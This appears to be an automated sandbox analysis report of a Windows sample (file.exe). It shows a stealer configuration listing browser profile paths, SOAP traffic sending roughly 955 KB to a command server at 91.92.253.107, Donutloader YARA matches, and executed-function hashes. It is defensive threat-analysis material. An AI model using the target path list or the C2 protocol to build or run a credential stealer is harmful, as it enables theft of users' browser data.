xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	91.92.253.107	1334	7056	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 20:25:29.301563025 CEST	220	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 91.92.253.107:1334 Content-Length: 955746 Expect: 100-continue Accept-Encoding: gzip, deflate
Sep 5, 2024 20:25:31.158516884 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 05 Sep 2024 18:25:31 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	91.92.253.107	1334	7056	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 20:25:31.185662031 CEST	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 91.92.253.107:1334 Content-Length: 955738 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Sep 5, 2024 20:25:32.629164934 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 05 Sep 2024 18:25:32 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	14:25:12
Start date:	05/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff6aac90000
File size:	2'208'256 bytes
MD5 hash:	6A94B94BA557D5D85A1DA20213D48974
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:25:32
Start date:	05/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356
Imagebase:	0x7ff693ba0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	36.3%
Total number of Nodes:	91
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000001D6098CAA1C Relevance: 2.9, APIs: 2, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 000001D6098CAA8F
VirtualFree.KERNELBASE ref: 000001D6098CADE5

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: f5b99b2b8197865502a0c20e0a45300b0a1618557c95df2a7c01c6c8e654c59a
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: D0C15370614D094BEB5DEA28C4957EAB3D2FB98301F184F6BE44AC7386DB34E9418A81

Function 00007FFD9B8B7289 Relevance: 2.7, Strings: 1, Instructions: 1495COMMON

Download Yara Rule

Strings

!, xrefs: 00007FFD9B8B77F8

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-764669442
Opcode ID: 895c06f2e7841e657e485126bed9e301430d9d2feda8f1463d74e2e0f22ea7a9
Instruction ID: ea071558a8dc9414e041e57538d3e5a8d8ccb0a7028f5b334f329e334be69ecb
Opcode Fuzzy Hash: 895c06f2e7841e657e485126bed9e301430d9d2feda8f1463d74e2e0f22ea7a9
Instruction Fuzzy Hash: 30B24075A0E7994FE36A8B7488616A57FE0EF5A310F0501BED0CAC72F3DD246946CB81

Function 00007FFD9B971EE5 Relevance: 2.7, Instructions: 2659COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aeb2455cfd231323e0d4d1339cd29a7919deee3c71d3f9bf14a59a9129bb11
Instruction ID: aa46a2f2a278ae20a4e4776ff03d269028355c1e21d128f3f3e8cd68fcc88126
Opcode Fuzzy Hash: 14aeb2455cfd231323e0d4d1339cd29a7919deee3c71d3f9bf14a59a9129bb11
Instruction Fuzzy Hash: B003A831B2EA494FD7A4EF6C84A4A6977E1FF99300F0505BEE09DC72A6DE24EC418741

Function 00007FFD9B970147 Relevance: 2.3, Strings: 1, Instructions: 1016COMMON

Download Yara Rule

Strings

p, xrefs: 00007FFD9B970F5A

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 1ebb3bc42ea1e9a6f4e51ab1a466d0ae84e8c14412de8190ba899ab6c13686e4
Instruction ID: 361199b0d3ce72abf0b9b258c458002e66ff4e9f66f7d00fe0ddf30cdcb66058
Opcode Fuzzy Hash: 1ebb3bc42ea1e9a6f4e51ab1a466d0ae84e8c14412de8190ba899ab6c13686e4
Instruction Fuzzy Hash: AA725861A2FBC65FE7539B7888B55A47BE1EF5635070A00FAD089CB1F3DE186D028351

Function 00007FFD9BB4C341 Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

', xrefs: 00007FFD9BB4C38C

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 5338703b063d42f8edb4db744335e5a3f5b10d771e4ca622803d22d50beae517
Instruction ID: a22f07302cbbfb1eaa900d39c846c37b5956439f80fe90155591ba1f023004cd
Opcode Fuzzy Hash: 5338703b063d42f8edb4db744335e5a3f5b10d771e4ca622803d22d50beae517
Instruction Fuzzy Hash: 1D22D031B1D94E4FEBA8EB6CD465A7477D2FF98314B0600BAE44DC72E6DE28AC418341

Function 00007FFD9BB4A7CC Relevance: 1.1, Instructions: 1106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e6e5b88f90f7f54df6b933c4f63ce8c9c51b29b49e68910caf275c3d9b283e9
Instruction ID: ee1677019fdc3ac156262d07c206d249d3bbc61f6d499a6d1bb0afce95ac926b
Opcode Fuzzy Hash: 6e6e5b88f90f7f54df6b933c4f63ce8c9c51b29b49e68910caf275c3d9b283e9
Instruction Fuzzy Hash: CD62B33071DA0D4FEBA8EB6C94A5A7573D2FF58314B1501B9E44EC72E6DE24EC428781

Function 00007FFD9B9729BE Relevance: .9, Instructions: 872COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfc64c6aa2023f9005e80fb26c62f4718ebb2da41a566df642fb09e4ad8cd07
Instruction ID: 2dca629d0c6958523048777b8df5b8d511a362675a4395ed0a330d543acdfc90
Opcode Fuzzy Hash: dbfc64c6aa2023f9005e80fb26c62f4718ebb2da41a566df642fb09e4ad8cd07
Instruction Fuzzy Hash: 7F528230B2EA894FDBA8EB6CC4A4A28B7E1FF55300B1544F9E05DC71A7DA25FD418740

Function 00007FFD9BB4B465 Relevance: .8, Instructions: 840COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f075e50bef115dff9479d2266656d1b88a6e319d3cdea77a702b19c05fe8662
Instruction ID: efdf3328c88e0d75eb09a70a060324f1331eae360623bf4121aad727d3eb5581
Opcode Fuzzy Hash: 4f075e50bef115dff9479d2266656d1b88a6e319d3cdea77a702b19c05fe8662
Instruction Fuzzy Hash: CB528530B19A0D8FDBB8DB58C4A5BA8B7E2FF98304F1541A9D04DD72A1DE34AD81CB41

Function 00007FFD9B8C461C Relevance: .8, Instructions: 762COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266eff71bd3f58327ec7ac75d4f2224db49359005a61e554a79afbfbb9ce6d29
Instruction ID: f5f081950d8a2e2e855092bbaa623e0956a5b7d241de1569d57cda8db905d3e3
Opcode Fuzzy Hash: 266eff71bd3f58327ec7ac75d4f2224db49359005a61e554a79afbfbb9ce6d29
Instruction Fuzzy Hash: 7242F67060DA8D4FEB79EB6888657B477E0FF49310F0941BED44DCB2A2DA34AA85C741

Function 00007FFD9B8BAF30 Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368ba62c1ee0b0a8f5559880eb9dd1f7fcaef4f754032115a2281b3664c89b29
Instruction ID: cc7656c83bc66a56b0125328fd73009b88752f051a2e33c7340b38f32cca9690
Opcode Fuzzy Hash: 368ba62c1ee0b0a8f5559880eb9dd1f7fcaef4f754032115a2281b3664c89b29
Instruction Fuzzy Hash: 2722F471B0DE4D4FEBA8EB6C98656B937D1EF9C310F05417BE44DC72A2DE24AD028681

Function 00007FFD9BB49CC9 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639258092a871f0938596629f2b9a0b04ed97859b8cb3b0331cffb13ed83cecb
Instruction ID: ada344fbd2f783bd18b998cd1f0c55c4320aeecbd12f3e38dd16b18a6041b1ef
Opcode Fuzzy Hash: 639258092a871f0938596629f2b9a0b04ed97859b8cb3b0331cffb13ed83cecb
Instruction Fuzzy Hash: 90124971B0E7894FE759AB7C846A6A97BD2FF95310B0541FFD08AC72E2DD2818428741

Function 00007FFD9B8BAE70 Relevance: .5, Instructions: 533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49c95466713fe9cb51c78d1ad30dffc0d865b6d692e4aafea3ffd836510f62f
Instruction ID: b4ddfeaa74305fa0c09392744be35f86c5bff8ccfd1aa55a665b5f992108e3bf
Opcode Fuzzy Hash: c49c95466713fe9cb51c78d1ad30dffc0d865b6d692e4aafea3ffd836510f62f
Instruction Fuzzy Hash: 51F12661B1D62E4AE7789BB8806967976C1EF8D310F16117DE49EC31E2DF28E9024FC1

Function 000001D6098CADF8 Relevance: .4, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
Instruction ID: a86450b56b88f273ed1618b482dd8eaa4932d2ba35bb483909cfa54a575b45e5
Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
Instruction Fuzzy Hash: C6D17F71518A488FDB59DF28D889AEA77E2FF98300F144A2EE88AC7255DF30E541CB41

Function 00007FFD9B8BB125 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a55f69a9e38b54f46b015b859ae378dd65952b9425c1e04e3374e35263f16fe
Instruction ID: 15061f0c7f2f86790e429830e18cb4341f041bff4c64d034fd2a6a1b900048a6
Opcode Fuzzy Hash: 1a55f69a9e38b54f46b015b859ae378dd65952b9425c1e04e3374e35263f16fe
Instruction Fuzzy Hash: 82A10727F0C0A609E32AF7B975699FD6764DFC533AB1982F7D16E8A0CBCD08244642D4

Function 000001D6098C9984 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001D6098CC234: LoadLibraryA.KERNEL32 ref: 000001D6098CC302

VirtualProtect.KERNEL32 ref: 000001D6098C9A00
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,000001D6098CAC2E), ref: 000001D6098C9A29
VirtualProtect.KERNEL32 ref: 000001D6098C9A6E
VirtualProtect.KERNEL32 ref: 000001D6098C9A92

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: b6fd5753669a0d995cdb91ddc1aa5e4f54c575ed7ab2fa76f09b63cb1f940d1f
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: DE31507171CA094FDB58EA28A8457AA73D6E7C9720F050AABE84BC33C6DD71D9064681

Function 000001D6098C99F3 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 000001D6098C9A00
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,000001D6098CAC2E), ref: 000001D6098C9A29
VirtualProtect.KERNEL32 ref: 000001D6098C9A6E
VirtualProtect.KERNEL32 ref: 000001D6098C9A92

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: ca26747c9bf7e52f85e602eadbd1f7452b174ff75c80ce73852a3f1a281fc822
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: 13215E7570CA084FDB58AA5CA8557A973D2F7C8720F140AABF84BC33CADD35DD064682

Function 000001D6098CA7A8 Relevance: 4.8, APIs: 3, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001D6098CA7F4
SysAllocString.OLEAUT32 ref: 000001D6098CA910
SafeArrayCreate.OLEAUT32 ref: 000001D6098CA982

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID: Create$AllocArrayInstanceSafeString
String ID:
API String ID: 3449113863-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 53fe0c3c1f9bd38b69fb446b8164196e7e87e94b97afc82466ec2fa41a7a89d7
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: AA815270218A088FDB6CEF28D8897A6B7E1FF55301F544A6EE49BC7151DB30E545CB81

Function 000001D6098CC234 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 000001D6098CC302

Strings

l, xrefs: 000001D6098CC29C

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: e5cc9203243267ecbfa4a68f67a6006aa828e57cc51e8c3dbc86f9a4df759340
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: E531C470518A854FE795DB2CD044B66BBD6FBA9308F285EAED0DEC3293D730D4068701

Function 000001D6098C9AB0 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001D6098CC234: LoadLibraryA.KERNEL32 ref: 000001D6098CC302

VirtualProtect.KERNEL32 ref: 000001D6098C9AFE
VirtualProtect.KERNEL32 ref: 000001D6098C9B26

Memory Dump Source

Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: ca8e9acb4d13e8a8a8fc2cd5c38b978d327958f6d000519aeca4257b827b0892
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: 0D115271718A184BDB94EB2898857AA77D6FBD8300F440E6BF84AC7245DE35DD418781

Function 00007FFD9B8C1E84 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFD9B8C1F2E

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 895698b4a23cd1a523459bf59773f748f04ec0ef0be834838d0d35e39c9c1113
Instruction ID: 623db5aecb3e77a42142dfc02f288a44133132c58f8f130a01360b466ebf043e
Opcode Fuzzy Hash: 895698b4a23cd1a523459bf59773f748f04ec0ef0be834838d0d35e39c9c1113
Instruction Fuzzy Hash: 8131C47190CA5C8FDB19EBA89849AE9BBF0FF55321F00826BD049D3151DB74A815CB91

Function 00007FFD9B8C18BA Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFD9B8C1F2E

Memory Dump Source

Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c1e77594fabbde88ff2e4c3833e06aa27436a3f94b4d4c5c53a413050a1258e
Instruction ID: 2ace2afda05e58d7d15b8e1f9854259be40757b890ae47eeb3096a17acae5519
Opcode Fuzzy Hash: 9c1e77594fabbde88ff2e4c3833e06aa27436a3f94b4d4c5c53a413050a1258e
Instruction Fuzzy Hash: 87217171A08A1C9FDB58EB989449BF9BBE0FB69311F00822FD049D3251DB70A8058B91

Function 00007FFD9BB40795 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9BB4081D

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 2a5221f332932c52572e7de0b02040a7e43b0b8287dda17f9d9bb2e931e5003e
Instruction ID: 97ec7412e4ca6709d4733e18632648c3145b8f5415ebeb1c38f5b335ed82bc05
Opcode Fuzzy Hash: 2a5221f332932c52572e7de0b02040a7e43b0b8287dda17f9d9bb2e931e5003e
Instruction Fuzzy Hash: DA313872B0EA4C0FEBA59A68A8751B83FD2FF99714B4500BAE08DC33E2DD2558018741

Function 00007FFD9B97477B Relevance: 1.1, Instructions: 1072COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b50198dbc7376da6f0af08be2a05d9b120cdd47a1b7cd8d6aaf10fcd8d937e
Instruction ID: cb4b21e55d261e3b8bf0f44dd1689458c90e6d5d835623d748b26853be8f0c71
Opcode Fuzzy Hash: 55b50198dbc7376da6f0af08be2a05d9b120cdd47a1b7cd8d6aaf10fcd8d937e
Instruction Fuzzy Hash: 9F021831B1EA891FD769DB6C88A56687BD1EF56710B0502FED08EC72F3DD18AC068781

Function 00007FFD9BB43748 Relevance: .6, Instructions: 581COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835070121.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9bb40000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ced1bab3f89bfdb530c82ab95e1b8f6335118658910e0564a0603781e765cd
Instruction ID: 7891258b5079bd23d5c643743170cac61cc87657368c5307b855a05dfd7b4361
Opcode Fuzzy Hash: b7ced1bab3f89bfdb530c82ab95e1b8f6335118658910e0564a0603781e765cd
Instruction Fuzzy Hash: E812F261B0E7CA0FE766976848356A87FA2BF56310B0A01FBD089CB1F3ED196D45C352

Function 00007FFD9B974278 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1835108097.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7ffd9b970000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f8ac0ad0877062512abe978ca6e1db0da1a71cab3ef6da2426360665102bc2
Instruction ID: dc528ff40db07d87d62fcebcbc04d9a6837473b376f0f7cb119fd2a2b39384b4
Opcode Fuzzy Hash: f6f8ac0ad0877062512abe978ca6e1db0da1a71cab3ef6da2426360665102bc2
Instruction Fuzzy Hash: 67D1293171EB895FD7A5DB6C88A4A697BE1FF9931070601FEE08DC72A3DD24AC428741

